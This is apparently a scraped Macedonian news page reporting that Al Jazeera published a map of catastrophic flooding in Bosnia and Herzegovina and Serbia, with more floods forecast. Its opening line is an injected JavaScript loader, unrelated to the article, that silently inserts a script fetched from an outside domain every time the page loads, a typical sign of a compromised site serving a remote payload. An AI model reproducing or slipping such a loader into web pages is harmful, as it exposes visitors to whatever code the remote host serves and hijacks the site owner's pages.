;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Објавена карта на поллавите на Балканот, најлошото допрва доаѓа? -

Објавена карта на поллавите на Балканот, најлошото допрва доаѓа?

Телевизијата Ал Џезеира, објави карта на која за прв пат може да се види колкав е обемот на поплавата која го зафати Балканот. Најпогодени се Босна и Херцеговина и Србија, каде поплавите се од катастрофални размери.

Голем дел од БиХ и Србија е под вода, а според најавите на хидролозите нов бран поплави следи во вторник.

Leave a Reply

Your email address will not be published.